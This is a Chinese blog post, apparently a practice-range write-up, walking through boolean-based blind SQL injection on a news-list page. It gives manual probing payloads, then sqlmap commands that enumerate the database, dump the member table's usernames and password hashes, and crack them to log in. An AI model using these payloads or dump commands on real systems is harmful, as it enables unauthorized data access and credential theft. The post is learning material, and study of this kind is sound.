SQL注入漏洞测试(布尔盲注)

最新推荐文章于 2024-04-06 15:25:32 发布
最新推荐文章于 2024-04-06 15:25:32 发布
阅读量751 收藏 1
点赞数
分类专栏: 笔记 文章标签: 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49091880/article/details/114915575
版权

SQL注入漏洞测试(布尔盲注)

 

1.打开靶场,寻找注入点。

点击公告/new_list.php?id=1,找到注入点。

 

2.输入id=1’ and 1=1,返回空页面

输入id=1 and 1=1,返回正常页面。

 

3.判断数据库名字的长度,输入id=1 and length(database())=1,返回空白页,证明不是1,一个一个试确定长度为10。

4.判断数据库的名字,输入id=1 and substr(database(),1,1)=‘a’ --+,返回空白页,最后第一个确定为s,一次类推,最后确定数据库名字为stormgroup。

 

5.发现这样一个一个试,太难受了。默默打开了kali,使用sqlmap。

输入:

 sqlmap -u http://219.153.49.228:41878/new_list.php?id=1 --current-db

 

输入:

 sqlmap -u http://219.153.49.228:41878/new_list.php?id=1 -D stormgroup --tables

输入

sqlmap -u http://219.153.49.228:41878/new_list.php?id=1 -D stormgroup -T member --columns

得到列名name,password,status

 

输入

sqlmap -u http://219.153.49.228:41878/new_list.php?id=1 -D stormgroup -T member -C

name,password --dump

获得两个密码。

 

6.两个密码都用md5解密,第二个登录成功,获取key。

第二个合适

登录:

 

 

 

 

墨轩小白
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
布尔盲注.py_sql盲注python_
10-03
布尔盲注(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
SQL注入注入出现位置、判断、编码、利用
07-01 5584
【SQL-注入
sql注入学习笔记(4)--sqlmap注入心得
azraelxuemo的博客
07-06 1405
其实也不算心得吧,只是一小小的体会,抛砖引玉 怎么说呢,还是主要分享一下sql注入的思路,具体的操作还是要看网站了 第一步,注入 sql注入最好的寻找方式就是用google,可以经常去google的exploit-db去寻找不错的注入,这里我也分享一些吧 google查询语句 提取码:yupw 然后手动简单的测试一下,如果觉得像注入的话就可以移入我们的sqlmap做进一步测试 当然我们也可以查一个网站下面的注入,就直接在这些语句后面加一限制比如说site:company.com .
利用SQLmap实现 SQL 注入
LAL07019的博客
06-28 1649
所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。
漏洞检测~SQL注入
北风
12-06 8109
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/78734503 漏洞成因: SQL注入主要存在于动态网站的web应用中,攻击者将恶意的sql语句插入到表单的输入域或网页请求的字符串中,提交给web服务器,如果应用程序没有对用户的输入进行检查和过滤,则会执行恶意的SQL语句,即SQL注入产生。 简而言之:SQL注入由于应...
SQL手工注入笔记1
weixin_46259951的博客
05-15 349
SQL手工注入笔记1 MySQL 数据库 SQL手工注入漏洞测试(MySQL数据库) 参考链接 实战靶场链接 图片链接都是我自建的博客里的,可能加载比较慢. 我的个人博客 首先先复习以下MySQL自带表中记录的信息 information_schema数据库中的 'SCHEMATA' 表记录整个数据库服务器中的库名称 ,'SCHEMA_NAME'是库名. 'TABLES'表记录每个库中的所有表名,'TABLE_SCHEMA'为库名,'TABLE_NAME'为对应的表名(多行). 'COLUMNS'表记录
SQL注入漏洞演示源代码
07-02
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理以及如何预防它。 SQL注入是一种利用不安全的...
自己动手编写SQL注入漏洞扫描工具
02-16
SQL注入漏洞扫描工具】是一种用于检测Web应用程序是否存在SQL注入漏洞的工具。SQL注入是网络安全领域中的一个重要问题,攻击者可以通过这种技术输入恶意SQL代码,从而获取、修改、删除数据库中的敏感信息,甚至...
自己动手编写SQL注入漏洞扫描器
12-24
### 自己动手编写SQL注入漏洞扫描器 #### 功能需求分析与实现思路 **功能需求:** 1. **支持单个/批量网站扫描** - 单个网站扫描功能是基本要求,它允许用户对特定目标进行深入检测。 - 批量网站扫描功能对于...
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
m0_73681638的博客
06-16 302
通常 Sql 注入漏洞分为 2 种类型:数字型,字符型。数字型判断:在加载好的Url 地址中输入and 1=1,页面依旧运行正常,继续进行下一步。断网页是否存在sql注入使用单引号判断法:在参数后面加上单引号, 原因为无论字符型还是整型都会 因为单引号个数不匹配而报错。使用火狐插件—hackbar,加载出当前界面的url,使用单引号判断法,页面返回错误,存在 Sql 注 入。
布尔盲注和时间盲注测试真实网站步骤
最新发布
a126976的博客
04-06 1199
若此时存在盲注,则会根据返回不同信息来判断数据库长度是否等于相对应值,如靶场的1或0,也可使用大于号>和小于号
渗透测试基础-盲注布尔盲注和时间盲注
weixin_45488495的博客
04-09 4286
渗透测试基础-盲注布尔盲注和时间盲注盲注实现的关键函数布尔盲注靶场演练时间盲注靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 盲注的特如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔盲注和时间盲注 盲注也分布尔盲注和时间盲注,这里分别来了解一下各自的区别 布尔盲注:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
SQL注入】0x2 sql注入基础知识
Mitchell_Donovan的博客
03-30 413
0x2 sql注入基础知识 0x2.1 如何判断否存在sql注入 常见的判断:1、get 单引号判断?id=1' 如果报错说明存在sql注入 例如我们实验室: 打开漏洞环境Less-1错误型GET单引号字符型注入 输入?id=1显示正常 输入?id=1'显示错误,所以就存在sql注入'的url编码是%27 2、get and判断 输入?id=-1 and 1=1 正常 输入?id=-1'and 1=2 报错 如果报错,那就存在sql,在请求字符串或者id参数后面加入 '单引号,是常见的一种发现是否存在
SQL Injection (Blind)之盲注(原理、分类、利用)
weixin_51513059的博客
03-24 3537
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔盲注(Boolean based)基于时间的盲注(Time based)
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
SQL 注入漏洞(六)布尔盲注
不秃头的程序Yang
06-11 1113
二、判断盲注
(手工)【sqli-labs8-10】盲注布尔盲注、时间盲注
07-06 1205
【Sql-盲注】详细过程
网络安全学习笔记——SQL注入应用(布尔盲注
just do it
04-18 69
页面没有回显,即没有显示账号,密码——就要盲注盲注也是基于union联合注入limit() 切割的时候从下标为0的开始切割,substr() 从下标为1开始切割暴力盲注手工盲注不太现实,暴力爆库费时费力,所以要用工具帮我们完成一些复杂工作,如Python脚本和SqlMap(自动化的爆表工具)
burpsuite sql注入漏洞测试(布尔盲注)
07-27
当使用Burp Suite进行SQL注入漏洞测试时,布尔盲注是一种常用的技术之一。布尔盲注是一种盲注攻击技术,它通过在SQL查询中使用布尔逻辑来确定数据库中的信息。以下是一些步骤来测试布尔盲注漏洞: 1. 配置Burp ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值